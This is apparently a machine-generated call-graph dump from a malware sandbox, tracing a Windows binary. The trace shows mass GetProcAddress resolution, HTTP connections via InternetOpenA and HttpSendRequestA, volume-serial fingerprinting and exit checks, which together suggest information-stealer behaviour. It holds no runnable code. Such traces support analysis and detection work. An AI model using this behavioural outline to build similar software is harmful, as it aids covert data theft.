57526->57527 57528 402e0c 57527->57528 57529 404610 34 API calls 57528->57529 57530 402e25 57529->57530 57531 404610 34 API calls 57530->57531 57532 402e3e 57531->57532 57533 404610 34 API calls 57532->57533 57534 402e57 57533->57534 57535 404610 34 API calls 57534->57535 57536 402e70 57535->57536 57537 404610 34 API calls 57536->57537 57538 402e89 57537->57538 57539 404610 34 API calls 57538->57539 57540 402ea2 57539->57540 57541 404610 34 API calls 57540->57541 57542 402ebb 57541->57542 57543 404610 34 API calls 57542->57543 57544 402ed4 57543->57544 57545 404610 34 API calls 57544->57545 57546 402eed 57545->57546 57547 404610 34 API calls 57546->57547 57548 402f06 57547->57548 57549 404610 34 API calls 57548->57549 57550 402f1f 57549->57550 57551 404610 34 API calls 57550->57551 57552 402f38 57551->57552 57553 404610 34 API calls 57552->57553 57554 402f51 57553->57554 57555 404610 34 API calls 57554->57555 57556 402f6a 57555->57556 57557 404610 34 API calls 57556->57557 57558 402f83 57557->57558 57559 404610 34 API calls 57558->57559 57560 402f9c 57559->57560 57561 404610 34 API calls 57560->57561 57562 402fb5 57561->57562 57563 404610 34 API calls 57562->57563 57564 402fce 57563->57564 57565 404610 34 API calls 57564->57565 57566 402fe7 57565->57566 57567 404610 34 API calls 57566->57567 57568 403000 57567->57568 57569 404610 34 API calls 57568->57569 57570 403019 57569->57570 57571 404610 34 API calls 57570->57571 57572 403032 57571->57572 57573 404610 34 API calls 57572->57573 57574 40304b 57573->57574 57575 404610 34 API calls 57574->57575 57576 403064 57575->57576 57577 404610 34 API calls 57576->57577 57578 40307d 57577->57578 57579 404610 34 API calls 57578->57579 57580 403096 57579->57580 57581 404610 34 API calls 57580->57581 57582 4030af 57581->57582 57583 404610 34 API calls 57582->57583 57584 4030c8 57583->57584 57585 404610 34 API calls 57584->57585 57586 4030e1 57585->57586 57587 404610 34 API calls 57586->57587 57588 4030fa 57587->57588 57589 404610 34 API calls 57588->57589 57590 403113 57589->57590 57591 404610 34 API calls 57590->57591 57592 40312c 57591->57592 57593 404610 34 API calls 57592->57593 57594 403145 57593->57594 57595 404610 34 API calls 57594->57595 57596 40315e 57595->57596 57597 404610 34 API calls 57596->57597 57598 403177 57597->57598 57599 404610 34 API calls 57598->57599 57600 403190 57599->57600 57601 404610 34 API calls 57600->57601 57602 4031a9 57601->57602 57603 404610 34 API calls 57602->57603 57604 4031c2 57603->57604 57605 404610 34 API calls 57604->57605 57606 4031db 57605->57606 57607 404610 34 API calls 57606->57607 57608 4031f4 57607->57608 57609 404610 34 API calls 57608->57609 57610 40320d 57609->57610 57611 404610 34 API calls 57610->57611 57612 403226 57611->57612 57613 404610 34 API calls 57612->57613 57614 40323f 57613->57614 57615 404610 34 API calls 57614->57615 57616 403258 57615->57616 57617 404610 34 API calls 57616->57617 57618 403271 57617->57618 57619 404610 34 API calls 57618->57619 57620 40328a 57619->57620 57621 404610 34 API calls 57620->57621 57622 4032a3 57621->57622 57623 404610 34 API calls 57622->57623 57624 4032bc 57623->57624 57625 404610 34 API calls 57624->57625 57626 4032d5 57625->57626 57627 404610 34 API calls 57626->57627 57628 4032ee 57627->57628 57629 404610 34 API calls 57628->57629 57630 403307 57629->57630 57631 404610 34 API calls 57630->57631 57632 403320 57631->57632 57633 404610 34 API calls 57632->57633 57634 403339 57633->57634 57635 404610 34 API calls 57634->57635 57636 403352 57635->57636 57637 404610 34 API calls 57636->57637 57638 40336b 57637->57638 57639 404610 34 API calls 57638->57639 57640 403384 57639->57640 57641 404610 34 API calls 57640->57641 57642 40339d 57641->57642 57643 404610 34 API calls 57642->57643 57644 4033b6 57643->57644 57645 404610 34 API calls 57644->57645 57646 4033cf 57645->57646 57647 404610 34 API calls 57646->57647 57648 4033e8 57647->57648 57649 404610 34 API calls 57648->57649 57650 403401 57649->57650 57651 404610 34 API calls 57650->57651 57652 40341a 57651->57652 57653 404610 34 API calls 57652->57653 57654 403433 57653->57654 57655 404610 34 API calls 57654->57655 57656 40344c 57655->57656 57657 404610 34 API calls 57656->57657 57658 403465 57657->57658 57659 404610 34 API calls 57658->57659 57660 40347e 57659->57660 57661 404610 34 API calls 57660->57661 57662 403497 57661->57662 57663 404610 34 API calls 57662->57663 57664 4034b0 57663->57664 57665 404610 34 API calls 57664->57665 57666 4034c9 57665->57666 57667 404610 34 API calls 57666->57667 57668 4034e2 57667->57668 57669 404610 34 API calls 57668->57669 57670 4034fb 57669->57670 57671 404610 34 API calls 57670->57671 57672 403514 57671->57672 57673 404610 34 API calls 57672->57673 57674 40352d 57673->57674 57675 404610 34 API calls 57674->57675 57676 403546 57675->57676 57677 404610 34 API calls 57676->57677 57678 40355f 57677->57678 57679 404610 34 API calls 57678->57679 57680 403578 57679->57680 57681 404610 34 API calls 57680->57681 57682 403591 57681->57682 57683 404610 34 API calls 57682->57683 57684 4035aa 57683->57684 57685 404610 34 API calls 57684->57685 57686 4035c3 57685->57686 57687 404610 34 API calls 57686->57687 57688 4035dc 57687->57688 57689 404610 34 API calls 57688->57689 57690 4035f5 57689->57690 57691 404610 34 API calls 57690->57691 57692 40360e 57691->57692 57693 404610 34 API calls 57692->57693 57694 403627 57693->57694 57695 404610 34 API calls 57694->57695 57696 403640 57695->57696 57697 404610 34 API calls 57696->57697 57698 403659 57697->57698 57699 404610 34 API calls 57698->57699 57700 403672 57699->57700 57701 404610 34 API calls 57700->57701 57702 40368b 57701->57702 57703 404610 34 API calls 57702->57703 57704 4036a4 57703->57704 57705 404610 34 API calls 57704->57705 57706 4036bd 57705->57706 57707 404610 34 API calls 57706->57707 57708 4036d6 57707->57708 57709 404610 34 API calls 57708->57709 57710 4036ef 57709->57710 57711 404610 34 API calls 57710->57711 57712 403708 57711->57712 57713 404610 34 API calls 57712->57713 57714 403721 57713->57714 57715 404610 34 API calls 57714->57715 57716 40373a 57715->57716 57717 404610 34 API calls 57716->57717 57718 403753 57717->57718 57719 404610 34 API calls 57718->57719 57720 40376c 57719->57720 57721 404610 34 API calls 57720->57721 57722 403785 57721->57722 57723 404610 34 API calls 57722->57723 57724 40379e 57723->57724 57725 404610 34 API calls 57724->57725 57726 4037b7 57725->57726 57727 404610 34 API calls 57726->57727 57728 4037d0 57727->57728 57729 404610 34 API calls 57728->57729 57730 4037e9 57729->57730 57731 404610 34 API calls 57730->57731 57732 403802 57731->57732 57733 404610 34 API calls 57732->57733 57734 40381b 57733->57734 57735 404610 34 API calls 57734->57735 57736 403834 57735->57736 57737 404610 34 API calls 57736->57737 57738 40384d 57737->57738 57739 404610 34 API calls 57738->57739 57740 403866 57739->57740 57741 404610 34 API calls 57740->57741 57742 40387f 57741->57742 57743 404610 34 API calls 57742->57743 57744 403898 57743->57744 57745 404610 34 API calls 57744->57745 57746 4038b1 57745->57746 57747 404610 34 API calls 57746->57747 57748 4038ca 57747->57748 57749 404610 34 API calls 57748->57749 57750 4038e3 57749->57750 57751 404610 34 API calls 57750->57751 57752 4038fc 57751->57752 57753 404610 34 API calls 57752->57753 57754 403915 57753->57754 57755 404610 34 API calls 57754->57755 57756 40392e 57755->57756 57757 404610 34 API calls 57756->57757 57758 403947 57757->57758 57759 404610 34 API calls 57758->57759 57760 403960 57759->57760 57761 404610 34 API calls 57760->57761 57762 403979 57761->57762 57763 404610 34 API calls 57762->57763 57764 403992 57763->57764 57765 404610 34 API calls 57764->57765 57766 4039ab 57765->57766 57767 404610 34 API calls 57766->57767 57768 4039c4 57767->57768 57769 404610 34 API calls 57768->57769 57770 4039dd 57769->57770 57771 404610 34 API calls 57770->57771 57772 4039f6 57771->57772 57773 404610 34 API calls 57772->57773 57774 403a0f 57773->57774 57775 404610 34 API calls 57774->57775 57776 403a28 57775->57776 57777 404610 34 API calls 57776->57777 57778 403a41 57777->57778 57779 404610 34 API calls 57778->57779 57780 403a5a 57779->57780 57781 404610 34 API calls 57780->57781 57782 403a73 57781->57782 57783 404610 34 API calls 57782->57783 57784 403a8c 57783->57784 57785 404610 34 API calls 57784->57785 57786 403aa5 57785->57786 57787 404610 34 API calls 57786->57787 57788 403abe 57787->57788 57789 404610 34 API calls 57788->57789 57790 403ad7 57789->57790 57791 404610 34 API calls 57790->57791 57792 403af0 57791->57792 57793 404610 34 API calls 57792->57793 57794 403b09 57793->57794 57795 404610 34 API calls 57794->57795 57796 403b22 57795->57796 57797 404610 34 API calls 57796->57797 57798 403b3b 57797->57798 57799 404610 34 API calls 57798->57799 57800 403b54 57799->57800 57801 404610 34 API calls 57800->57801 57802 403b6d 57801->57802 57803 404610 34 API calls 57802->57803 57804 403b86 57803->57804 57805 404610 34 API calls 57804->57805 57806 403b9f 57805->57806 57807 404610 34 API calls 57806->57807 57808 403bb8 57807->57808 57809 404610 34 API calls 57808->57809 57810 403bd1 57809->57810 57811 404610 34 API calls 57810->57811 57812 403bea 57811->57812 57813 404610 34 API calls 57812->57813 57814 403c03 57813->57814 57815 404610 34 API calls 57814->57815 57816 403c1c 57815->57816 57817 404610 34 API calls 57816->57817 57818 403c35 57817->57818 57819 404610 34 API calls 57818->57819 57820 403c4e 57819->57820 57821 404610 34 API calls 57820->57821 57822 403c67 57821->57822 57823 404610 34 API calls 57822->57823 57824 403c80 57823->57824 57825 404610 34 API calls 57824->57825 57826 403c99 57825->57826 57827 404610 34 API calls 57826->57827 57828 403cb2 57827->57828 57829 404610 34 API calls 57828->57829 57830 403ccb 57829->57830 57831 404610 34 API calls 57830->57831 57832 403ce4 57831->57832 57833 404610 34 API calls 57832->57833 57834 403cfd 57833->57834 57835 404610 34 API calls 57834->57835 57836 403d16 57835->57836 57837 404610 34 API calls 57836->57837 57838 403d2f 57837->57838 57839 404610 34 API calls 57838->57839 57840 403d48 57839->57840 57841 404610 34 API calls 57840->57841 57842 403d61 57841->57842 57843 404610 34 API calls 57842->57843 57844 403d7a 57843->57844 57845 404610 34 API calls 57844->57845 57846 403d93 57845->57846 57847 404610 34 API calls 57846->57847 57848 403dac 57847->57848 57849 404610 34 API calls 57848->57849 57850 403dc5 57849->57850 57851 404610 34 API calls 57850->57851 57852 403dde 57851->57852 57853 404610 34 API calls 57852->57853 57854 403df7 57853->57854 57855 404610 34 API calls 57854->57855 57856 403e10 57855->57856 57857 404610 34 API calls 57856->57857 57858 403e29 57857->57858 57859 404610 34 API calls 57858->57859 57860 403e42 57859->57860 57861 404610 34 API calls 57860->57861 57862 403e5b 57861->57862 57863 404610 34 API calls 57862->57863 57864 403e74 57863->57864 57865 404610 34 API calls 57864->57865 57866 403e8d 57865->57866 57867 404610 34 API calls 57866->57867 57868 403ea6 57867->57868 57869 404610 34 API calls 57868->57869 57870 403ebf 57869->57870 57871 404610 34 API calls 57870->57871 57872 403ed8 57871->57872 57873 404610 34 API calls 57872->57873 57874 403ef1 57873->57874 57875 404610 34 API calls 57874->57875 57876 403f0a 57875->57876 57877 404610 34 API calls 57876->57877 57878 403f23 57877->57878 57879 404610 34 API calls 57878->57879 57880 403f3c 57879->57880 57881 404610 34 API calls 57880->57881 57882 403f55 57881->57882 57883 404610 34 API calls 57882->57883 57884 403f6e 57883->57884 57885 404610 34 API calls 57884->57885 57886 403f87 57885->57886 57887 404610 34 API calls 57886->57887 57888 403fa0 57887->57888 57889 404610 34 API calls 57888->57889 57890 403fb9 57889->57890 57891 404610 34 API calls 57890->57891 57892 403fd2 57891->57892 57893 404610 34 API calls 57892->57893 57894 403feb 57893->57894 57895 404610 34 API calls 57894->57895 57896 404004 57895->57896 57897 404610 34 API calls 57896->57897 57898 40401d 57897->57898 57899 404610 34 API calls 57898->57899 57900 404036 57899->57900 57901 404610 34 API calls 57900->57901 57902 40404f 57901->57902 57903 404610 34 API calls 57902->57903 57904 404068 57903->57904 57905 404610 34 API calls 57904->57905 57906 404081 57905->57906 57907 404610 34 API calls 57906->57907 57908 40409a 57907->57908 57909 404610 34 API calls 57908->57909 57910 4040b3 57909->57910 57911 404610 34 API calls 57910->57911 57912 4040cc 57911->57912 57913 404610 34 API calls 57912->57913 57914 4040e5 57913->57914 57915 404610 34 API calls 57914->57915 57916 4040fe 57915->57916 57917 404610 34 API calls 57916->57917 57918 404117 57917->57918 57919 404610 34 API calls 57918->57919 57920 404130 57919->57920 57921 404610 34 API calls 57920->57921 57922 404149 57921->57922 57923 404610 34 API calls 57922->57923 57924 404162 57923->57924 57925 404610 34 API calls 57924->57925 57926 40417b 57925->57926 57927 404610 34 API calls 57926->57927 57928 404194 57927->57928 57929 404610 34 API calls 57928->57929 57930 4041ad 57929->57930 57931 404610 34 API calls 57930->57931 57932 4041c6 57931->57932 57933 404610 34 API calls 57932->57933 57934 4041df 57933->57934 57935 404610 34 API calls 57934->57935 57936 4041f8 57935->57936 57937 404610 34 API calls 57936->57937 57938 404211 57937->57938 57939 404610 34 API calls 57938->57939 57940 40422a 57939->57940 57941 404610 34 API calls 57940->57941 57942 404243 57941->57942 57943 404610 34 API calls 57942->57943 57944 40425c 57943->57944 57945 404610 34 API calls 57944->57945 57946 404275 57945->57946 57947 404610 34 API calls 57946->57947 57948 40428e 57947->57948 57949 404610 34 API calls 57948->57949 57950 4042a7 57949->57950 57951 404610 34 API calls 57950->57951 57952 4042c0 57951->57952 57953 404610 34 API calls 57952->57953 57954 4042d9 57953->57954 57955 404610 34 API calls 57954->57955 57956 4042f2 57955->57956 57957 404610 34 API calls 57956->57957 57958 40430b 57957->57958 57959 404610 34 API calls 57958->57959 57960 404324 57959->57960 57961 404610 34 API calls 57960->57961 57962 40433d 57961->57962 57963 404610 34 API calls 57962->57963 57964 404356 57963->57964 57965 404610 34 API calls 57964->57965 57966 40436f 57965->57966 57967 404610 34 API calls 57966->57967 57968 404388 57967->57968 57969 404610 34 API calls 57968->57969 57970 4043a1 57969->57970 57971 404610 34 API calls 57970->57971 57972 4043ba 57971->57972 57973 404610 34 API calls 57972->57973 57974 4043d3 57973->57974 57975 404610 34 API calls 57974->57975 57976 4043ec 57975->57976 57977 404610 34 API calls 57976->57977 57978 404405 57977->57978 57979 404610 34 API calls 57978->57979 57980 40441e 57979->57980 57981 404610 34 API calls 57980->57981 57982 404437 57981->57982 57983 404610 34 API calls 57982->57983 57984 404450 57983->57984 57985 404610 34 API calls 57984->57985 57986 404469 57985->57986 57987 404610 34 API calls 57986->57987 57988 404482 57987->57988 57989 404610 34 API calls 57988->57989 57990 40449b 57989->57990 57991 404610 34 API calls 57990->57991 57992 4044b4 57991->57992 57993 404610 34 API calls 57992->57993 57994 4044cd 57993->57994 57995 404610 34 API calls 57994->57995 57996 4044e6 57995->57996 57997 404610 34 API calls 57996->57997 57998 4044ff 57997->57998 57999 404610 34 API calls 57998->57999 58000 404518 57999->58000 58001 404610 34 API calls 58000->58001 58002 404531 58001->58002 58003 404610 34 API calls 58002->58003 58004 40454a 58003->58004 58005 404610 34 API calls 58004->58005 58006 404563 58005->58006 58007 404610 34 API calls 58006->58007 58008 40457c 58007->58008 58009 404610 34 API calls 58008->58009 58010 404595 58009->58010 58011 404610 34 API calls 58010->58011 58012 4045ae 58011->58012 58013 404610 34 API calls 58012->58013 58014 4045c7 58013->58014 58015 404610 34 API calls 58014->58015 58016 4045e0 58015->58016 58017 404610 34 API calls 58016->58017 58018 4045f9 58017->58018 58019 419f20 58018->58019 58020 419f30 43 API calls 58019->58020 58021 41a346 8 API calls 58019->58021 58020->58021 58022 41a456 58021->58022 58023 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58021->58023 58024 41a463 8 API calls 58022->58024 58025 41a526 58022->58025 58023->58022 58024->58025 58026 41a5a8 58025->58026 58027 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58025->58027 58028 41a5b5 6 API calls 58026->58028 58029 41a647 58026->58029 58027->58026 58028->58029 58030 41a654 9 API calls 58029->58030 58031 41a72f 58029->58031 58030->58031 58032 41a7b2 58031->58032 58033 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58031->58033 58034 41a7bb GetProcAddress GetProcAddress 58032->58034 58035 41a7ec 58032->58035 58033->58032 58034->58035 58036 41a825 58035->58036 58037 41a7f5 GetProcAddress GetProcAddress 58035->58037 58038 41a922 58036->58038 58039 41a832 10 API calls 58036->58039 58037->58036 58040 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58038->58040 58041 41a98d 58038->58041 58039->58038 58040->58041 58042 41a996 GetProcAddress 58041->58042 58043 41a9ae 58041->58043 58042->58043 58044 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58043->58044 58045 415ef3 58043->58045 58044->58045 58046 401590 58045->58046 59145 4016b0 58046->59145 58049 41aab0 lstrcpy 58050 4015b5 58049->58050 58051 41aab0 lstrcpy 58050->58051 58052 4015c7 58051->58052 58053 41aab0 lstrcpy 58052->58053 58054 4015d9 58053->58054 58055 41aab0 lstrcpy 58054->58055 58056 401663 58055->58056 58057 415760 58056->58057 58058 415771 58057->58058 58059 41ab30 2 API calls 58058->58059 58060 41577e 58059->58060 58061 41ab30 2 API calls 58060->58061 58062 41578b 58061->58062 58063 41ab30 2 API calls 58062->58063 58064 415798 58063->58064 58065 41aa50 lstrcpy 58064->58065 58066 4157a5 58065->58066 58067 41aa50 lstrcpy 58066->58067 58068 4157b2 58067->58068 58069 41aa50 lstrcpy 58068->58069 58070 4157bf 58069->58070 58071 41aa50 lstrcpy 58070->58071 58109 4157cc 58071->58109 58072 415893 StrCmpCA 58072->58109 58073 4158f0 StrCmpCA 58074 415a2c 58073->58074 58073->58109 58075 41abb0 lstrcpy 58074->58075 58076 415a38 58075->58076 58077 41ab30 2 API calls 58076->58077 58078 415a46 58077->58078 58080 41ab30 2 API calls 58078->58080 58079 415aa6 StrCmpCA 58081 415be1 58079->58081 58079->58109 58083 415a55 58080->58083 58082 41abb0 lstrcpy 58081->58082 58084 415bed 58082->58084 58085 4016b0 lstrcpy 58083->58085 58087 41ab30 2 API calls 58084->58087 58111 415a61 58085->58111 58086 41ab30 lstrlenA lstrcpy 58086->58109 58088 415bfb 58087->58088 58092 41ab30 2 API calls 58088->58092 58089 415c5b StrCmpCA 58093 415c66 Sleep 58089->58093 58094 415c78 58089->58094 58090 41aa50 lstrcpy 58090->58109 58091 41aab0 lstrcpy 58091->58109 58096 415c0a 58092->58096 58093->58109 58095 41abb0 lstrcpy 58094->58095 58098 415c84 58095->58098 58099 4016b0 lstrcpy 58096->58099 58097 401590 lstrcpy 58097->58109 58100 41ab30 2 API calls 58098->58100 58099->58111 58102 415c93 58100->58102 58101 415510 29 API calls 58101->58109 58103 41ab30 2 API calls 58102->58103 58104 415ca2 58103->58104 58107 4016b0 lstrcpy 58104->58107 58105 41abb0 lstrcpy 58105->58109 58106 4159da StrCmpCA 58106->58109 58107->58111 58108 415b8f StrCmpCA 58108->58109 58109->58072 58109->58073 58109->58079 58109->58086 58109->58089 58109->58090 58109->58091 58109->58097 58109->58101 58109->58105 58109->58106 58109->58108 58110 415440 23 API calls 58109->58110 58110->58109 58111->57164 58113 4176e3 GetVolumeInformationA 58112->58113 58114 4176dc 58112->58114 58115 417721 58113->58115 58114->58113 58116 41778c GetProcessHeap HeapAlloc 58115->58116 58117 4177a9 58116->58117 58118 4177b8 wsprintfA 58116->58118 58119 41aa50 lstrcpy 58117->58119 58120 41aa50 lstrcpy 58118->58120 58121 415ff7 58119->58121 58120->58121 58121->57185 58123 41aab0 lstrcpy 58122->58123 58124 4048e9 58123->58124 59154 404800 58124->59154 58126 4048f5 58127 41aa50 lstrcpy 58126->58127 58128 404927 58127->58128 58129 41aa50 lstrcpy 58128->58129 58130 404934 58129->58130 58131 41aa50 lstrcpy 58130->58131 58132 404941 58131->58132 58133 41aa50 lstrcpy 58132->58133 58134 40494e 58133->58134 58135 41aa50 lstrcpy 58134->58135 58136 40495b InternetOpenA StrCmpCA 58135->58136 58137 404994 58136->58137 58138 404f1b InternetCloseHandle 58137->58138 59162 418cf0 58137->59162 58140 404f38 58138->58140 59177 40a210 CryptStringToBinaryA 58140->59177 58141 4049b3 59170 41ac30 58141->59170 58144 4049c6 58146 41abb0 lstrcpy 58144->58146 58151 4049cf 58146->58151 58147 41ab30 2 API calls 58148 404f55 58147->58148 58149 41acc0 4 API calls 58148->58149 58152 404f6b 58149->58152 58150 404f77 moneypunct 58154 41aab0 lstrcpy 58150->58154 58155 41acc0 4 API calls 58151->58155 58153 41abb0 lstrcpy 58152->58153 58153->58150 58167 404fa7 58154->58167 58156 4049f9 58155->58156 58157 41abb0 lstrcpy 58156->58157 58158 404a02 58157->58158 58159 41acc0 4 API calls 58158->58159 58160 404a21 58159->58160 58161 41abb0 lstrcpy 58160->58161 58162 404a2a 58161->58162 58163 41ac30 3 API calls 58162->58163 58164 404a48 58163->58164 58165 41abb0 lstrcpy 58164->58165 58166 404a51 58165->58166 58168 41acc0 4 API calls 58166->58168 58167->57188 58169 404a70 58168->58169 58170 41abb0 lstrcpy 58169->58170 58171 404a79 58170->58171 58172 41acc0 4 API calls 58171->58172 58173 404a98 58172->58173 58174 41abb0 lstrcpy 58173->58174 58175 404aa1 58174->58175 58176 41acc0 4 API calls 58175->58176 58177 404acd 58176->58177 58178 41ac30 3 API calls 58177->58178 58179 404ad4 58178->58179 58180 41abb0 lstrcpy 58179->58180 58181 404add 58180->58181 58182 404af3 InternetConnectA 58181->58182 58182->58138 58183 404b23 HttpOpenRequestA 58182->58183 58185 404b78 58183->58185 58186 404f0e InternetCloseHandle 58183->58186 58187 41acc0 4 API calls 58185->58187 58186->58138 58188 404b8c 58187->58188 58189 41abb0 lstrcpy 58188->58189 58190 404b95 58189->58190 58191 41ac30 3 API calls 58190->58191 58192 404bb3 58191->58192 58193 41abb0 lstrcpy 58192->58193 58194 404bbc 58193->58194 58195 41acc0 4 API calls 58194->58195 58196 404bdb 58195->58196 58197 41abb0 lstrcpy 58196->58197 58198 404be4 58197->58198 58199 41acc0 4 API calls 58198->58199 58200 404c05 58199->58200 58201 41abb0 lstrcpy 58200->58201 58202 404c0e 58201->58202 58203 41acc0 4 API calls 58202->58203 58204 404c2e 58203->58204 58205 41abb0 lstrcpy 58204->58205 58206 404c37 58205->58206 58207 41acc0 4 API calls 58206->58207 58208 404c56 58207->58208 58209 41abb0 lstrcpy 58208->58209 58210 404c5f 58209->58210 58211 41ac30 3 API calls 58210->58211 58212 404c7d 58211->58212 58213 41abb0 lstrcpy 58212->58213 58214 404c86 58213->58214 58215 41acc0 4 API calls 58214->58215 58216 404ca5 58215->58216 58217 41abb0 lstrcpy 58216->58217 58218 404cae 58217->58218 58219 41acc0 4 API calls 58218->58219 58220 404ccd 58219->58220 58221 41abb0 lstrcpy 58220->58221 58222 404cd6 58221->58222 58223 41ac30 3 API calls 58222->58223 58224 404cf4 58223->58224 58225 41abb0 lstrcpy 58224->58225 58226 404cfd 58225->58226 58227 41acc0 4 API calls 58226->58227 58228 404d1c 58227->58228 58229 41abb0 lstrcpy 58228->58229 58230 404d25 58229->58230 58231 41acc0 4 API calls 58230->58231 58232 404d46 58231->58232 58233 41abb0 lstrcpy 58232->58233 58234 404d4f 58233->58234 58235 41acc0 4 API calls 58234->58235 58236 404d6f 58235->58236 58237 41abb0 lstrcpy 58236->58237 58238 404d78 58237->58238 58239 41acc0 4 API calls 58238->58239 58240 404d97 58239->58240 58241 41abb0 lstrcpy 58240->58241 58242 404da0 58241->58242 58243 41ac30 3 API calls 58242->58243 58244 404dbe 58243->58244 58245 41abb0 lstrcpy 58244->58245 58246 404dc7 58245->58246 58247 41aa50 lstrcpy 58246->58247 58248 404de2 58247->58248 58249 41ac30 3 API calls 58248->58249 58250 404e03 58249->58250 58251 41ac30 3 API calls 58250->58251 58252 404e0a 58251->58252 58253 41abb0 lstrcpy 58252->58253 58254 404e16 58253->58254 58255 404e37 lstrlenA 58254->58255 58256 404e4a 58255->58256 58257 404e53 lstrlenA 58256->58257 59176 41ade0 58257->59176 58259 404e63 HttpSendRequestA 58260 404e82 InternetReadFile 58259->58260 58261 404eb7 InternetCloseHandle 58260->58261 58266 404eae 58260->58266 58264 41ab10 58261->58264 58263 41acc0 4 API calls 58263->58266 58264->58186 58265 41abb0 lstrcpy 58265->58266 58266->58260 58266->58261 58266->58263 58266->58265 59186 41ade0 58267->59186 58269 411a14 StrCmpCA 58270 411a27 58269->58270 58271 411a1f ExitProcess 58269->58271 58272 411a37 strtok_s 58270->58272 58280 411a44 58272->58280 58273 411c12 58273->57190 58274 411bee strtok_s 58274->58280 58275 411b41 StrCmpCA 58275->58280 58276 411ba1 StrCmpCA 58276->58280 58277 411bc0 StrCmpCA 58277->58280 58278 411b63 StrCmpCA 58278->58280 58279 411b82 StrCmpCA 58279->58280 58280->58273 58280->58274 58280->58275 58280->58276 58280->58277 58280->58278 58280->58279 58281 411aad StrCmpCA 58280->58281 58282 411acf StrCmpCA 58280->58282 58283 411afd StrCmpCA 58280->58283 58284 411b1f StrCmpCA 58280->58284 58285 41ab30 lstrlenA lstrcpy 58280->58285 58286 41ab30 2 API calls 58280->58286 58281->58280 58282->58280 58283->58280 58284->58280 58285->58280 58286->58274 58288 41aab0 lstrcpy 58287->58288 58289 4059c9 58288->58289 58290 404800 5 API calls 58289->58290 58291 4059d5 58290->58291 58292 41aa50 lstrcpy 58291->58292 58293 405a0a 58292->58293 58294 41aa50 lstrcpy 58293->58294 58295 405a17 58294->58295 58296 41aa50 lstrcpy 58295->58296 58297 405a24 58296->58297 58298 41aa50 lstrcpy 58297->58298 58299 405a31 58298->58299 58300 41aa50 lstrcpy 58299->58300 58301 405a3e InternetOpenA StrCmpCA 58300->58301 58302 405a6d 58301->58302 58303 406013 InternetCloseHandle 58302->58303 58305 418cf0 3 API calls 58302->58305 58304 406030 58303->58304 58307 40a210 4 API calls 58304->58307 58306 405a8c 58305->58306 58308 41ac30 3 API calls 58306->58308 58309 406036 58307->58309 58310 405a9f 58308->58310 58312 41ab30 2 API calls 58309->58312 58315 40606f moneypunct 58309->58315 58311 41abb0 lstrcpy 58310->58311 58317 405aa8 58311->58317 58313 40604d 58312->58313 58314 41acc0 4 API calls 58313->58314 58316 406063 58314->58316 58318 406090 EntryPoint 58315->58318 58319 41abb0 lstrcpy 58316->58319 58321 41acc0 4 API calls 58317->58321 58320 4060a7 58318->58320 58319->58315 58320->57196 58322 405ad2 58321->58322 58323 41abb0 lstrcpy 58322->58323 58324 405adb 58323->58324 58325 41acc0 4 API calls 58324->58325 58326 405afa 58325->58326 58327 41abb0 lstrcpy 58326->58327 58328 405b03 58327->58328 58329 41ac30 3 API calls 58328->58329 58330 405b21 58329->58330 58331 41abb0 lstrcpy 58330->58331 58332 405b2a 58331->58332 58333 41acc0 4 API calls 58332->58333 58334 405b49 58333->58334 58335 41abb0 lstrcpy 58334->58335 58336 405b52 58335->58336 58337 41acc0 4 API calls 58336->58337 58338 405b71 58337->58338 58339 41abb0 lstrcpy 58338->58339 58340 405b7a 58339->58340 58341 41acc0 4 API calls 58340->58341 58342 405ba6 58341->58342 58343 41ac30 3 API calls 58342->58343 58344 405bad 58343->58344 58345 41abb0 lstrcpy 58344->58345 58346 405bb6 58345->58346 58347 405bcc InternetConnectA 58346->58347 58347->58303 58348 405bfc HttpOpenRequestA 58347->58348 58350 406006 InternetCloseHandle 58348->58350 58351 405c5b 58348->58351 58350->58303 58352 41acc0 4 API calls 58351->58352 58353 405c6f 58352->58353 58354 41abb0 lstrcpy 58353->58354 58355 405c78 58354->58355 58356 41ac30 3 API calls 58355->58356 58357 405c96 58356->58357 58358 41abb0 lstrcpy 58357->58358 58359 405c9f 58358->58359 58360 41acc0 4 API calls 58359->58360 58361 405cbe 58360->58361 58362 41abb0 lstrcpy 58361->58362 58363 405cc7 58362->58363 58364 41acc0 4 API calls 58363->58364 58365 405ce8 58364->58365 58366 41abb0 lstrcpy 58365->58366 58367 405cf1 58366->58367 58368 41acc0 4 API calls 58367->58368 58369 405d11 58368->58369 58370 41abb0 lstrcpy 58369->58370 58371 405d1a 58370->58371 58372 41acc0 4 API calls 58371->58372 58373 405d39 58372->58373 58374 41abb0 lstrcpy 58373->58374 58375 405d42 58374->58375 58376 41ac30 3 API calls 58375->58376 58377 405d60 58376->58377 58378 41abb0 lstrcpy 58377->58378 58379 405d69 58378->58379 58380 41acc0 4 API calls 58379->58380 58381 405d88 58380->58381 58382 41abb0 lstrcpy 58381->58382 58383 405d91 58382->58383 58384 41acc0 4 API calls 58383->58384 58385 405db0 58384->58385 58386 41abb0 lstrcpy 58385->58386 58387 405db9 58386->58387 58388 41ac30 3 API calls 58387->58388 58389 405dd7 58388->58389 58390 41abb0 lstrcpy 58389->58390 58391 405de0 58390->58391 58392 41acc0 4 API calls 58391->58392 58393 405dff 58392->58393 58394 41abb0 lstrcpy 58393->58394 58395 405e08 58394->58395 58396 41acc0 4 API calls 58395->58396 58397 405e29 58396->58397 58398 41abb0 lstrcpy 58397->58398 58399 405e32 58398->58399 58400 41acc0 4 API calls 58399->58400 58401 405e52 58400->58401 58402 41abb0 lstrcpy 58401->58402 58403 405e5b 58402->58403 58404 41acc0 4 API calls 58403->58404 58405 405e7a 58404->58405 58406 41abb0 lstrcpy 58405->58406 58407 405e83 58406->58407 58408 41ac30 3 API calls 58407->58408 58409 405ea4 58408->58409 58410 41abb0 lstrcpy 58409->58410 58411 405ead 58410->58411 58412 405ec0 lstrlenA 58411->58412 59187 41ade0 58412->59187 58414 405ed1 lstrlenA GetProcessHeap HeapAlloc 59188 41ade0 58414->59188 58416 405efe lstrlenA 59189 41ade0 58416->59189 58418 405f0e memcpy 59190 41ade0 58418->59190 58420 405f27 lstrlenA 58421 405f37 58420->58421 58422 405f40 lstrlenA memcpy 58421->58422 59191 41ade0 58422->59191 58424 405f6a lstrlenA 59192 41ade0 58424->59192 58426 405f7a 